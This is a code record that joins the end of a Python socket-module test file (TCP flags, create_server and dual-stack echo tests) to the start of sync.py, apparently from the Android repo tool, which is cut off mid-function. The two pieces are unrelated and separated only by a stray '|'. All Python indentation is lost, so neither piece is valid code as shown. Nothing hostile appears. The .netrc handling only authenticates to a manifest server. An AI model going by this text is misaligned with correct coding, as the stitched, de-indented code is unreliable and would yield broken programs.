'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
def test_address(self):
port = support.find_unused_port()
with socket.create_server(("127.0.0.1", port)) as sock:
self.assertEqual(sock.getsockname()[0], "127.0.0.1")
self.assertEqual(sock.getsockname()[1], port)
if support.IPV6_ENABLED:
with socket.create_server(("::1", port),
family=socket.AF_INET6) as sock:
self.assertEqual(sock.getsockname()[0], "::1")
self.assertEqual(sock.getsockname()[1], port)
def test_family_and_type(self):
with socket.create_server(("127.0.0.1", 0)) as sock:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
if support.IPV6_ENABLED:
with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
self.assertEqual(s.family, socket.AF_INET6)
self.assertEqual(sock.type, socket.SOCK_STREAM)
def test_reuse_port(self):
if not hasattr(socket, "SO_REUSEPORT"):
with self.assertRaises(ValueError):
socket.create_server(("localhost", 0), reuse_port=True)
else:
with socket.create_server(("localhost", 0)) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertEqual(opt, 0)
with socket.create_server(("localhost", 0), reuse_port=True) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertNotEqual(opt, 0)
@unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
not hasattr(_socket, 'IPV6_V6ONLY'),
"IPV6_V6ONLY option not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_ipv6_only_default(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dualstack_ipv6_family(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.assertEqual(sock.family, socket.AF_INET6)
class CreateServerFunctionalTest(unittest.TestCase):
timeout = 3
def setUp(self):
self.thread = None
def tearDown(self):
if self.thread is not None:
self.thread.join(self.timeout)
def echo_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
with conn:
event.wait(self.timeout)
msg = conn.recv(1024)
if not msg:
return
conn.sendall(msg)
event = threading.Event()
sock.settimeout(self.timeout)
self.thread = threading.Thread(target=run, args=(sock, ))
self.thread.start()
event.set()
def echo_client(self, addr, family):
with socket.socket(family=family) as sock:
sock.settimeout(self.timeout)
sock.connect(addr)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
def test_tcp4(self):
port = support.find_unused_port()
with socket.create_server(("", port)) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_tcp6(self):
port = support.find_unused_port()
with socket.create_server(("", port),
family=socket.AF_INET6) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
# --- dual stack tests
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v4(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v6(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
UDPTimeoutTest, CreateServerTest, CreateServerFunctionalTest]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.append(BasicQIPCRTRTest)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
sync.py | # Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import http.cookiejar as cookielib
import json
import netrc
from optparse import SUPPRESS_HELP
import os
import re
import socket
import subprocess
import sys
import tempfile
import time
import urllib.error
import urllib.parse
import urllib.request
import xmlrpc.client
try:
import threading as _threading
except ImportError:
import dummy_threading as _threading
try:
import resource
def _rlimit_nofile():
return resource.getrlimit(resource.RLIMIT_NOFILE)
except ImportError:
def _rlimit_nofile():
return (256, 256)
try:
import multiprocessing
except ImportError:
multiprocessing = None
import event_log
from git_command import GIT, git_require
from git_config import GetUrlCookieFile
from git_refs import R_HEADS, HEAD
import git_superproject
import gitc_utils
from project import Project
from project import RemoteSpec
from command import Command, MirrorSafeCommand
from error import RepoChangedException, GitError, ManifestParseError
import platform_utils
from project import SyncBuffer
from progress import Progress
from wrapper import Wrapper
from manifest_xml import GitcManifest
_ONE_DAY_S = 24 * 60 * 60
class _FetchError(Exception):
"""Internal error thrown in _FetchHelper() when we don't want stack trace."""
class _CheckoutError(Exception):
"""Internal error thrown in _CheckoutOne() when we don't want stack trace."""
class Sync(Command, MirrorSafeCommand):
jobs = 1
common = True
helpSummary = "Update working tree to the latest revision"
helpUsage = """
%prog [<project>...]
"""
helpDescription = """
The '%prog' command synchronizes local project directories
with the remote repositories specified in the manifest. If a local
project does not yet exist, it will clone a new local directory from
the remote repository and set up tracking branches as specified in
the manifest. If the local project already exists, '%prog'
will update the remote branches and rebase any new local changes
on top of the new remote changes.
'%prog' will synchronize all projects listed at the command
line. Projects can be specified either by name, or by a relative
or absolute path to the project's local directory. If no projects
are specified, '%prog' will synchronize all projects listed in
the manifest.
The -d/--detach option can be used to switch specified projects
back to the manifest revision. This option is especially helpful
if the project is currently on a topic branch, but the manifest
revision is temporarily needed.
The -s/--smart-sync option can be used to sync to a known good
build as specified by the manifest-server element in the current
manifest. The -t/--smart-tag option is similar and allows you to
specify a custom tag/label.
The -u/--manifest-server-username and -p/--manifest-server-password
options can be used to specify a username and password to authenticate
with the manifest server when using the -s or -t option.
If -u and -p are not specified when using the -s or -t option, '%prog'
will attempt to read authentication credentials for the manifest server
from the user's .netrc file.
'%prog' will not use authentication credentials from -u/-p or .netrc
if the manifest server specified in the manifest file already includes
credentials.
By default, all projects will be synced. The --fail-fast option can be used
to halt syncing as soon as possible when the first project fails to sync.
The --force-sync option can be used to overwrite existing git
directories if they have previously been linked to a different
object directory. WARNING: This may cause data to be lost since
refs may be removed when overwriting.
The --force-remove-dirty option can be used to remove previously used
projects with uncommitted changes. WARNING: This may cause data to be
lost since uncommitted changes may be removed with projects that no longer
exist in the manifest.
The --no-clone-bundle option disables any attempt to use
$URL/clone.bundle to bootstrap a new Git repository from a
resumeable bundle file on a content delivery network. This
may be necessary if there are problems with the local Python
HTTP client or proxy configuration, but the Git binary works.
The --fetch-submodules option enables fetching Git submodules
of a project from server.
The -c/--current-branch option can be used to only fetch objects that
are on the branch specified by a project's revision.
The --optimized-fetch option can be used to only fetch projects that
are fixed to a sha1 revision if the sha1 revision does not already
exist locally.
The --prune option can be used to remove any refs that no longer
exist on the remote.
# SSH Connections
If at least one project remote URL uses an SSH connection (ssh://,
git+ssh://, or user@host:path syntax) repo will automatically
enable the SSH ControlMaster option when connecting to that host.
This feature permits other projects in the same '%prog' session to
reuse the same SSH tunnel, saving connection setup overheads.
To disable this behavior on UNIX platforms, set the GIT_SSH
environment variable to 'ssh'. For example:
export GIT_SSH=ssh
%prog
# Compatibility
This feature is automatically disabled on Windows, due to the lack
of UNIX domain socket support.
This feature is not compatible with url.insteadof rewrites in the
user's ~/.gitconfig. '%prog' is currently not able to perform the
rewrite early enough to establish the ControlMaster tunnel.
If the remote SSH daemon is Gerrit Code Review, version 2.0.10 or
later is required to fix a server side protocol bug.
"""
PARALLEL_JOBS = 1
def _Options(self, p, show_smart=True):
try:
self.PARALLEL_JOBS = self.manifest.default.sync_j
except ManifestParseError:
pass
super()._Options(p)
p.add_option('-f', '--force-broken',
dest='force_broken', action='store_true',
help='obsolete option (to be deleted in the future)')
p.add_option('--fail-fast',
dest='fail_fast', action='store_true',
help='stop syncing after first error is hit')
p.add_option('--force-sync',
dest='force_sync', action='store_true',
help="overwrite an existing git directory if it needs to "
"point to a different object directory. WARNING: this "
"may cause loss of data")
p.add_option('--force-remove-dirty',
dest='force_remove_dirty', action='store_true',
help="force remove projects with uncommitted modifications if "
"projects no longer exist in the manifest. "
"WARNING: this may cause loss of data")
p.add_option('-l', '--local-only',
dest='local_only', action='store_true',
help="only update working tree, don't fetch")
p.add_option('--no-manifest-update', '--nmu',
dest='mp_update', action='store_false', default='true',
help='use the existing manifest checkout as-is. '
'(do not update to the latest revision)')
p.add_option('-n', '--network-only',
dest='network_only', action='store_true',
help="fetch only, don't update working tree")
p.add_option('-d', '--detach',
dest='detach_head', action='store_true',
help='detach projects back to manifest revision')
p.add_option('-c', '--current-branch',
dest='current_branch_only', action='store_true',
help='fetch only current branch from server')
p.add_option('-v', '--verbose',
dest='output_mode', action='store_true',
help='show all sync output')
p.add_option('-q', '--quiet',
dest='output_mode', action='store_false',
help='only show errors')
p.add_option('-m', '--manifest-name',
dest='manifest_name',
help='temporary manifest to use for this sync', metavar='NAME.xml')
p.add_option('--clone-bundle', action='store_true',
help='enable use of /clone.bundle on HTTP/HTTPS')
p.add_option('--no-clone-bundle', dest='clone_bundle', action='store_false',
help='disable use of /clone.bundle on HTTP/HTTPS')
p.add_option('-u', '--manifest-server-username', action='store',
dest='manifest_server_username',
help='username to authenticate with the manifest server')
p.add_option('-p', '--manifest-server-password', action='store',
dest='manifest_server_password',
help='password to authenticate with the manifest server')
p.add_option('--fetch-submodules',
dest='fetch_submodules', action='store_true',
help='fetch submodules from server')
p.add_option('--use-superproject', action='store_true',
help='use the manifest superproject to sync projects')
p.add_option('--no-tags',
dest='tags', default=True, action='store_false',
help="don't fetch tags")
p.add_option('--optimized-fetch',
dest='optimized_fetch', action='store_true',
help='only fetch projects fixed to sha1 if revision does not exist locally')
p.add_option('--retry-fetches',
default=0, action='store', type='int',
help='number of times to retry fetches on transient errors')
p.add_option('--prune', dest='prune', action='store_true',
help='delete refs that no longer exist on the remote')
if show_smart:
p.add_option('-s', '--smart-sync',
dest='smart_sync', action='store_true',
help='smart sync using manifest from the latest known good build')
p.add_option('-t', '--smart-tag',
dest='smart_tag', action='store',
help='smart sync using manifest from a known tag')
g = p.add_option_group('repo Version options')
g.add_option('--no-repo-verify',
dest='repo_verify', default=True, action='store_false',
help='do not verify repo source code')
g.add_option('--repo-upgraded',
dest='repo_upgraded', action='store_true',
help=SUPPRESS_HELP)
def _GetBranch(self):
"""Returns the branch name for getting the approved manifest."""
p = self.manifest.manifestProject
b = p.GetBranch(p.CurrentBranch)
branch = b.merge
if branch.startswith(R_HEADS):
branch = branch[len(R_HEADS):]
return branch
def _UpdateProjectsRevisionId(self, opt, args):
"""Update revisionId of every project with the SHA from superproject.
This function updates each project's revisionId with SHA from superproject.
It writes the updated manifest into a file and reloads the manifest from it.
Args:
opt: Program options returned from optparse. See _Options().
args: Arguments to pass to GetProjects. See the GetProjects
docstring for details.
Returns:
Returns path to the overriding manifest file.
"""
superproject = git_superproject.Superproject(self.manifest,
self.repodir)
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
manifest_path = superproject.UpdateProjectsRevisionId(all_projects)
if not manifest_path:
print('error: Update of revsionId from superproject has failed',
file=sys.stderr)
sys.exit(1)
self._ReloadManifest(manifest_path)
return manifest_path
def _FetchProjectList(self, opt, projects, sem, *args, **kwargs):
"""Main function of the fetch threads.
Delegates most of the work to _FetchHelper.
Args:
opt: Program options returned from optparse. See _Options().
projects: Projects to fetch.
sem: We'll release() this semaphore when we exit so that another thread
can be started up.
*args, **kwargs: Remaining arguments to pass to _FetchHelper. See the
_FetchHelper docstring for details.
"""
try:
for project in projects:
success = self._FetchHelper(opt, project, *args, **kwargs)
if not success and opt.fail_fast:
break
finally:
sem.release()
def _FetchHelper(self, opt, project, lock, fetched, pm, err_event,
clone_filter):
"""Fetch git objects for a single project.
Args:
opt: Program options returned from optparse. See _Options().
project: Project object for the project to fetch.
lock: Lock for accessing objects that are shared amongst multiple
_FetchHelper() threads.
fetched: set object that we will add project.gitdir to when we're done
(with our lock held).
pm: Instance of a Project object. We will call pm.update() (with our
lock held).
err_event: We'll set this event in the case of an error (after printing
out info about the error).
clone_filter: Filter for use in a partial clone.
Returns:
Whether the fetch was successful.
"""
# We'll set to true once we've locked the lock.
did_lock = False
# Encapsulate everything in a try/except/finally so that:
# - We always set err_event in the case of an exception.
# - We always make sure we unlock the lock if we locked it.
start = time.time()
success = False
try:
try:
success = project.Sync_NetworkHalf(
quiet=opt.quiet,
verbose=opt.verbose,
current_branch_only=opt.current_branch_only,
force_sync=opt.force_sync,
clone_bundle=opt.clone_bundle,
tags=opt.tags, archive=self.manifest.IsArchive,
optimized_fetch=opt.optimized_fetch,
retry_fetches=opt.retry_fetches,
prune=opt.prune,
clone_filter=clone_filter)
self._fetch_times.Set(project, time.time() - start)
# Lock around all the rest of the code, since printing, updating a set
# and Progress.update() are not thread safe.
lock.acquire()
did_lock = True
if not success:
err_event.set()
print('error: Cannot fetch %s from %s'
% (project.name, project.remote.url),
file=sys.stderr)
if opt.fail_fast:
raise _FetchError()
fetched.add(project.gitdir)
pm.update(msg=project.name)
except _FetchError:
pass
except Exception as e:
print('error: Cannot fetch %s (%s: %s)'
% (project.name, type(e).__name__, str(e)), file=sys.stderr)
err_event.set()
raise
finally:
if did_lock:
lock.release()
finish = time.time()
self.event_log.AddSync(project, event_log.TASK_SYNC_NETWORK,
start, finish, success)
return success
def _Fetch(self, projects, opt, err_event):
fetched = set()
lock = _threading.Lock()
pm = Progress('Fetching projects', len(projects),
always_print_percentage=opt.quiet)
objdir_project_map = dict()
for project in projects:
objdir_project_map.setdefault(project.objdir, []).append(project)
threads = set()
sem = _threading.Semaphore(self.jobs)
for project_list in objdir_project_map.values():
# Check for any errors before running any more tasks.
# ...we'll let existing threads finish, though.
if err_event.is_set() and opt.fail_fast:
break
sem.acquire()
kwargs = dict(opt=opt,
projects=project_list,
sem=sem,
lock=lock,
fetched=fetched,
pm=pm,
err_event=err_event,
clone_filter=self.manifest.CloneFilter)
if self.jobs > 1:
t = _threading.Thread(target=self._FetchProjectList,
kwargs=kwargs)
# Ensure that Ctrl-C will not freeze the repo process.
t.daemon = True
threads.add(t)
t.start()
else:
self._FetchProjectList(**kwargs)
for t in threads:
t.join()
pm.end()
self._fetch_times.Save()
if not self.manifest.IsArchive:
self._GCProjects(projects, opt, err_event)
return fetched
def _CheckoutWorker(self, opt, sem, project, *args, **kwargs):
"""Main function of the fetch threads.
Delegates most of the work to _CheckoutOne.
Args:
opt: Program options returned from optparse. See _Options().
projects: Projects to fetch.
sem: We'll release() this semaphore when we exit so that another thread
can be started up.
*args, **kwargs: Remaining arguments to pass to _CheckoutOne. See the
_CheckoutOne docstring for details.
"""
try:
return self._CheckoutOne(opt, project, *args, **kwargs)
finally:
sem.release()
def _CheckoutOne(self, opt, project, lock, pm, err_event, err_results):
"""Checkout work tree for one project
Args:
opt: Program options returned from optparse. See _Options().
project: Project object for the project to checkout.
lock: Lock for accessing objects that are shared amongst multiple
_CheckoutWorker() threads.
pm: Instance of a Project object. We will call pm.update() (with our
lock held).
err_event: We'll set this event in the case of an error (after printing
out info about the error).
err_results: A list of strings, paths to git repos where checkout
failed.
Returns:
Whether the fetch was successful.
"""
# We'll set to true once we've locked the lock.
did_lock = False
# Encapsulate everything in a try/except/finally so that:
# - We always set err_event in the case of an exception.
# - We always make sure we unlock the lock if we locked it.
start = time.time()
syncbuf = SyncBuffer(self.manifest.manifestProject.config,
detach_head=opt.detach_head)
success = False
try:
try:
project.Sync_LocalHalf(syncbuf, force_sync=opt.force_sync)
# Lock around all the rest of the code, since printing, updating a set
# and Progress.update() are not thread safe.
lock.acquire()
success = syncbuf.Finish()
did_lock = True
if not success:
err_event.set()
print('error: Cannot checkout %s' % (project.name),
file=sys.stderr)
raise _CheckoutError()
pm.update(msg=project.name)
except _CheckoutError:
pass
except Exception as e:
print('error: Cannot checkout %s: %s: %s' %
(project.name, type(e).__name__, str(e)),
file=sys.stderr)
err_event.set()
raise
finally:
if did_lock:
if not success:
err_results.append(project.relpath)
lock.release()
finish = time.time()
self.event_log.AddSync(project, event_log.TASK_SYNC_LOCAL,
start, finish, success)
return success
def _Checkout(self, all_projects, opt, err_event, err_results):
"""Checkout projects listed in all_projects
Args:
all_projects: List of all projects that should be checked out.
opt: Program options returned from optparse. See _Options().
err_event: We'll set this event in the case of an error (after printing
out info about the error).
err_results: A list of strings, paths to git repos where checkout
failed.
"""
# Perform checkouts in multiple threads when we are using partial clone.
# Without partial clone, all needed git objects are already downloaded,
# in this situation it's better to use only one process because the checkout
# would be mostly disk I/O; with partial clone, the objects are only
# downloaded when demanded (at checkout time), which is similar to the
# Sync_NetworkHalf case and parallelism would be helpful.
if self.manifest.CloneFilter:
syncjobs = self.jobs
else:
syncjobs = 1
lock = _threading.Lock()
pm = Progress('Checking out projects', len(all_projects))
threads = set()
sem = _threading.Semaphore(syncjobs)
for project in all_projects:
# Check for any errors before running any more tasks.
# ...we'll let existing threads finish, though.
if err_event.is_set() and opt.fail_fast:
break
sem.acquire()
if project.worktree:
kwargs = dict(opt=opt,
sem=sem,
project=project,
lock=lock,
pm=pm,
err_event=err_event,
err_results=err_results)
if syncjobs > 1:
t = _threading.Thread(target=self._CheckoutWorker,
kwargs=kwargs)
# Ensure that Ctrl-C will not freeze the repo process.
t.daemon = True
threads.add(t)
t.start()
else:
self._CheckoutWorker(**kwargs)
for t in threads:
t.join()
pm.end()
def _GCProjects(self, projects, opt, err_event):
gc_gitdirs = {}
for project in projects:
# Make sure pruning never kicks in with shared projects.
if (not project.use_git_worktrees and
len(project.manifest.GetProjectsWithName(project.name)) > 1):
if not opt.quiet:
print('%s: Shared project %s found, disabling pruning.' %
(project.relpath, project.name))
if git_require((2, 7, 0)):
project.EnableRepositoryExtension('preciousObjects')
else:
# This isn't perfect, but it's the best we can do with old git.
print('%s: WARNING: shared projects are unreliable when using old '
'versions of git; please upgrade to git-2.7.0+.'
% (project.relpath,),
file=sys.stderr)
project.config.SetString('gc.pruneExpire', 'never')
gc_gitdirs[project.gitdir] = project.bare_git
if multiprocessing:
cpu_count = multiprocessing.cpu_count()
else:
cpu_count = 1
jobs = min(self.jobs, cpu_count)
if jobs < 2:
for bare_git in gc_gitdirs.values():
bare_git.gc('--auto')
return
config = {'pack.threads': cpu_count // jobs if cpu_count > jobs else 1}
threads = set()
sem = _threading.Semaphore(jobs)
def GC(bare_git):
try:
try:
bare_git.gc('--auto', config=config)
except GitError:
err_event.set()
except Exception:
err_event.set()
raise
finally:
sem.release()
for bare_git in gc_gitdirs.values():
if err_event.is_set() and opt.fail_fast:
break
sem.acquire()
t = _threading.Thread(target=GC, args=(bare_git,))
t.daemon = True
threads.add(t)
t.start()
for t in threads:
t.join()
def _ReloadManifest(self, manifest_name=None):
if manifest_name:
# Override calls _Unload already
self.manifest.Override(manifest_name)
else:
self.manifest._Unload()
def UpdateProjectList(self, opt):
new_project_paths = []
for project in self.GetProjects(None, missing_ok=True):
if project.relpath:
new_project_paths.append(project.relpath)
file_name = 'project.list'
file_path = os.path.join(self.repodir, file_name)
old_project_paths = []
if os.path.exists(file_path):
with open(file_path, 'r') as fd:
old_project_paths = fd.read().split('\n')
# In reversed order, so subfolders are deleted before parent folder.
for path in sorted(old_project_paths, reverse=True):
if not path:
continue
if path not in new_project_paths:
# If the path has already been deleted, we don't need to do it
gitdir = os.path.join(self.manifest.topdir, path, '.git')
if os.path.exists(gitdir):
project = Project(
manifest=self.manifest,
name=path,
remote=RemoteSpec('origin'),
gitdir=gitdir,
objdir=gitdir,
use_git_worktrees=os.path.isfile(gitdir),
worktree=os.path.join(self.manifest.topdir, path),
relpath=path,
revisionExpr='HEAD',
revisionId=None,
groups=None)
if not project.DeleteWorktree(
quiet=opt.quiet,
force=opt.force_remove_dirty):
return 1
new_project_paths.sort()
with open(file_path, 'w') as fd:
fd.write('\n'.join(new_project_paths))
fd.write('\n')
return 0
def _SmartSyncSetup(self, opt, smart_sync_manifest_path):
if not self.manifest.manifest_server:
print('error: cannot smart sync: no manifest server defined in '
'manifest', file=sys.stderr)
sys.exit(1)
manifest_server = self.manifest.manifest_server
if not opt.quiet:
print('Using manifest server %s' % manifest_server)
if '@' not in manifest_server:
username = None
password = None
if opt.manifest_server_username and opt.manifest_server_password:
username = opt.manifest_server_username
password = opt.manifest_server_password
else:
try:
info = netrc.netrc()
except IOError:
# .netrc file does not exist or could not be opened
pass
else:
try:
parse_result = urllib.parse.urlparse(manifest_server)
if parse_result.hostname:
auth = info.authenticators(parse_result.hostname)
if auth:
username, _account, password = auth
else:
print('No credentials found for %s in .netrc'
% parse_result.hostname, file=sys.stderr)
except netrc.NetrcParseError as e:
print('Error parsing .netrc file: %s' % e, file=sys.stderr)
if (username and password):
manifest_server = manifest_server.replace('://', '://%s:%s@' %
(username, password),
1)
transport = PersistentTransport(manifest_server)
if manifest_server.startswith('persistent-'):
manifest_server = manifest_server[len('persistent-'):]
try:
server = xmlrpc.client.Server(manifest_server, transport=transport)
if opt.smart_sync:
branch = self._GetBranch()
if 'SYNC_TARGET' in os.environ:
target = os.environ['SYNC_TARGET']
[success, manifest_str] = server.GetApprovedManifest(branch, target)
elif ('TARGET_PRODUCT' in os.environ and
'TARGET_BUILD_VARIANT' in os.environ):
target = '%s-%s' % (os.environ['TARGET_PRODUCT'],
os.environ['TARGET_BUILD_VARIANT'])
[success, manifest_str] = server.GetApprovedManifest(branch, target)
else:
[success, manifest_str] = server.GetApprovedManifest(branch)
else:
assert(opt.smart_tag)
[success, manifest_str] = server.GetManifest(opt.smart_tag)
if success:
manifest_name = os.path.basename(smart_sync_manifest_path)
try:
with open(smart_sync_manifest_path, 'w') as f:
f.write(manifest_str)
except IOError as e:
print('error: cannot write manifest to %s:\n%s'
% (smart_sync_manifest_path, e),
file=sys.stderr)
sys.exit(1)
self._ReloadManifest(manifest_name)
else:
print('error: manifest server RPC call failed: %s' %
manifest_str, file=sys.stderr)
sys.exit(1)
except (socket.error, IOError, xmlrpc.client.Fault) as e:
print('error: cannot connect to manifest server %s:\n%s'
% (self.manifest.manifest_server, e), file=sys.stderr)
sys.exit(1)
except xmlrpc.client.ProtocolError as e:
print('error: cannot connect to manifest server %s:\n%d %s'
% (self.manifest.manifest_server, e.errcode, e.errmsg),
file=sys.stderr)
sys.exit(1)
return manifest_name
def _UpdateManifestProject(self, opt, mp, manifest_name):
"""Fetch & update the local manifest project."""
if not opt.local_only:
start = time.time()
success = mp.Sync_NetworkHalf(quiet=opt.quiet, verbose=opt.verbose,
current_branch_only=opt.current_branch_only,
force_sync=opt.force_sync,
tags=opt.tags,
optimized_fetch=opt.optimized_fetch,
retry_fetches=opt.retry_fetches,
submodules=self.manifest.HasSubmodules,
clone_filter=self.manifest.CloneFilter)
finish = time.time()
self.event_log.AddSync(mp, event_log.TASK_SYNC_NETWORK,
start, finish, success)
if mp.HasChanges:
syncbuf = SyncBuffer(mp.config)
start = time.time()
mp.Sync_LocalHalf(syncbuf, submodules=self.manifest.HasSubmodules)
clean = syncbuf.Finish()
self.event_log.AddSync(mp, event_log.TASK_SYNC_LOCAL,
start, time.time(), clean)
if not clean:
sys.exit(1)
self._ReloadManifest(opt.manifest_name)
if opt.jobs is None:
self.jobs = self.manifest.default.sync_j
def ValidateOptions(self, opt, args):
if opt.force_broken:
print('warning: -f/--force-broken is now the default behavior, and the '
'options are deprecated', file=sys.stderr)
if opt.network_only and opt.detach_head:
self.OptionParser.error('cannot combine -n and -d')
if opt.network_only and opt.local_only:
self.OptionParser.error('cannot combine -n and -l')
if opt.manifest_name and opt.smart_sync:
self.OptionParser.error('cannot combine -m and -s')
if opt.manifest_name and opt.smart_tag:
self.OptionParser.error('cannot combine -m and -t')
if opt.manifest_server_username or opt.manifest_server_password:
if not (opt.smart_sync or opt.smart_tag):
self.OptionParser.error('-u and -p may only be combined with -s or -t')
if None in [opt.manifest_server_username, opt.manifest_server_password]:
self.OptionParser.error('both -u and -p must be given')
def Execute(self, opt, args):
if opt.jobs:
self.jobs = opt.jobs
if self.jobs > 1:
soft_limit, _ = _rlimit_nofile()
self.jobs = min(self.jobs, (soft_limit - 5) // 3)
opt.quiet = opt.output_mode is False
opt.verbose = opt.output_mode is True
if opt.manifest_name:
self.manifest.Override(opt.manifest_name)
manifest_name = opt.manifest_name
smart_sync_manifest_path = os.path.join(
self.manifest.manifestProject.worktree, 'smart_sync_override.xml')
if opt.clone_bundle is None:
opt.clone_bundle = self.manifest.CloneBundle
if opt.smart_sync or opt.smart_tag:
manifest_name = self._SmartSyncSetup(opt, smart_sync_manifest_path)
else:
if os.path.isfile(smart_sync_manifest_path):
try:
platform_utils.remove(smart_sync_manifest_path)
except OSError as e:
print('error: failed to remove existing smart sync override manifest: %s' %
e, file=sys.stderr)
err_event = _threading.Event()
rp = self.manifest.repoProject
rp.PreSync()
cb = rp.CurrentBranch
if cb:
base = rp.GetBranch(cb).merge
if not base or not base.startswith('refs/heads/'):
print('warning: repo is not tracking a remote branch, so it will not '
'receive updates; run `repo init --repo-rev=stable` to fix.',
file=sys.stderr)
mp = self.manifest.manifestProject
mp.PreSync()
if opt.repo_upgraded:
_PostRepoUpgrade(self.manifest, quiet=opt.quiet)
if not opt.mp_update:
print('Skipping update of local manifest project.')
else:
self._UpdateManifestProject(opt, mp, manifest_name)
if (opt.use_superproject or
self.manifest.manifestProject.config.GetBoolean(
'repo.superproject')):
manifest_name = self._UpdateProjectsRevisionId(opt, args)
if self.gitc_manifest:
gitc_manifest_projects = self.GetProjects(args,
missing_ok=True)
gitc_projects = []
opened_projects = []
for project in gitc_manifest_projects:
if project.relpath in self.gitc_manifest.paths and \
self.gitc_manifest.paths[project.relpath].old_revision:
opened_projects.append(project.relpath)
else:
gitc_projects.append(project.relpath)
if not args:
gitc_projects = None
if gitc_projects != [] and not opt.local_only:
print('Updating GITC client: %s' % self.gitc_manifest.gitc_client_name)
manifest = GitcManifest(self.repodir, self.gitc_manifest.gitc_client_name)
if manifest_name:
manifest.Override(manifest_name)
else:
manifest.Override(self.manifest.manifestFile)
gitc_utils.generate_gitc_manifest(self.gitc_manifest,
manifest,
gitc_projects)
print('GITC client successfully synced.')
# The opened projects need to be synced as normal, therefore we
# generate a new args list to represent the opened projects.
# TODO: make this more reliable -- if there's a project name/path overlap,
# this may choose the wrong project.
args = [os.path.relpath(self.manifest.paths[path].worktree, os.getcwd())
for path in opened_projects]
if not args:
return
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
err_network_sync = False
err_update_projects = False
err_checkout = False
self._fetch_times = _FetchTimes(self.manifest)
if not opt.local_only:
to_fetch = []
now = time.time()
if _ONE_DAY_S <= (now - rp.LastFetch):
